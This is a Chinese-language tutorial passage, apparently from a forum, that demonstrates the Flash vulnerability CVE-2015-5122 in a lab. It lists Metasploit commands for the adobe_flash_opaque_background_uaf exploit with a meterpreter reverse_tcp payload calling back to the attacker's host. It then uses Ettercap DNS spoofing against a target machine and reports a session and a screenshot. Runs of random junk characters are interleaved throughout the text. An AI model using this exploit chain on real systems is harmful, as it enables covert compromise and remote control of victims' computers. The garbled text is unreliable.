, f& X6 {( R K) \8 ?" m 二、cve2015-5122漏洞实例演示虚拟机 4 ~, P4 v3 Q) p3 e3 n
( N& O! v, m2 C) I( W5 H6 _
& ?' x. A- Z6 V2 n+ A 关于cve2015-5122这个漏洞,大家可以百度一下,是关于flash的漏洞,是2015年flash漏洞的第二发,今天我们就用这个漏洞来演示,开启kai linux msfconsole命令启动msf如图:
2 J; Y4 v- L3 g1 u5 u! l9 S1 ], @ % G# ~* r% F! D8 b
9 I3 n$ S: i8 K+ _5 e
search cve-2015-5122如图:
8 e) v9 I$ H E6 D. ]
5 l2 [4 V( g, R \9 ^4 H5 Z7 L4 R: I' g
2 |* m, L: j+ i
) J4 g2 Y9 E0 f5 v, t0 B- u% z
" F5 |5 m: v2 e6 J
下面我们敲如下命令:
0 l# E; O. a% N3 ]% }0 @ 3 m8 E! R6 [' E- Y5 N7 z) Q/ q! y
2 I4 w$ a2 B% s7 }; [% C8 V use exploit/multi/browser/adobe_flash_opaque_background_uaf " E% `4 x6 L: B9 Y" v& r
5 d1 H) ^" M% }6 x; G3 K
' n9 ^7 ?; R* I1 a. ~8 d, D/ E set PAYLOAD windows/meterpreter/reverse_tcp * i* L. l! C, {- s1 H
% m3 `- u4 m8 y. _" O
! l, _, Q! b0 H3 T! P set LHOST 192.168.0.109 8 P' Y8 K6 K7 A- s$ F
8 k* A% E' x5 @+ o
6 |( s9 V$ J% W1 E( u
set URIPATH / /*根目录*/ & A1 s T0 Q, A, t, U& q1 I$ E2 l
$ {3 o1 Y' c- @) n6 h! \5 K5 u
& g/ ~5 D. f: J
set SRVHOST 192.168.0.109 //192.168.0.109为kaili ip地址
1 o% Z- A( k& J2 n " k% p u _7 [; N% _
& {: X% B3 `' ?/ K6 ?; j set SRVPORT 80 /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用
+ e/ v) r; w+ @+ K6 ^% x : ^' \ h! l& @
( _5 [" ^- x0 {: S
然后show options如图: + i- ]( N, Y) m- N6 i9 w
2 k. @. z$ \ y: V2 O8 P
1 Q1 i( K* A6 z4 s+ _7 ]- @
6 t7 ~8 [' i, H+ w3 `4 S/ X 9 Z' ]6 R3 F* Y; W4 r* J
. O3 {( B4 _% t9 W
一切都设置好了,执行exploit。下面我们进etc/ettercap目录下设置etc.dns如图:
5 L: S% I5 S' A' Z1 Y5 Y. F
0 H7 t& m- k2 o 4 c) P& u' l; H5 L' |
, C. U$ F# R V+ k: k \; h/ W9 P 然后ettercap -G命令打开ettercap,我们要攻击的主机ip是192.168.0。115
9 m1 y; r7 a4 N
+ F3 R3 b! R& g) T; Y
2 H6 v, P# _( m Ettercap过程第一篇里已经演示,这里不在详细写了。。。执行完ettercap以后我们观察一下msf , X2 e( n' f3 o- N% @: v
" {# G; C9 ?- T5 ]% ?
( \0 l& t. {& v" m; `& Q2 B& i - r" D4 ^, P1 k. ?; N$ ]" P/ ]
- |# ]. W: n) Q, g3 f% ^
2 M6 W* N2 \* F: U2 J0 n! T* m 成功了,这时候我们断开ettercap,如图: ( L4 k" R7 ~% y7 C$ D
( v0 p6 d* O/ R
7 x/ v- `2 c+ l; h7 R
7 z( \0 Z: r& ?8 [) S" D6 I3 G $ Q6 }: ~3 V3 Z% |$ v/ P
7 [9 g* P( C w" q Screenshot如图: - _& N5 w& `' Q$ I% V; Z
1 o' R6 f; u9 l
7 l+ F3 ^, W; x. @, y
- a1 h/ P a/ R5 g- Q( c9 V
8 \* u$ J a8 R2 o
9 f4 j5 [/ @4 L' x! O6 f% C
9 ^6 H; u+ Q: ~; S$ `) |5 B% s7 o |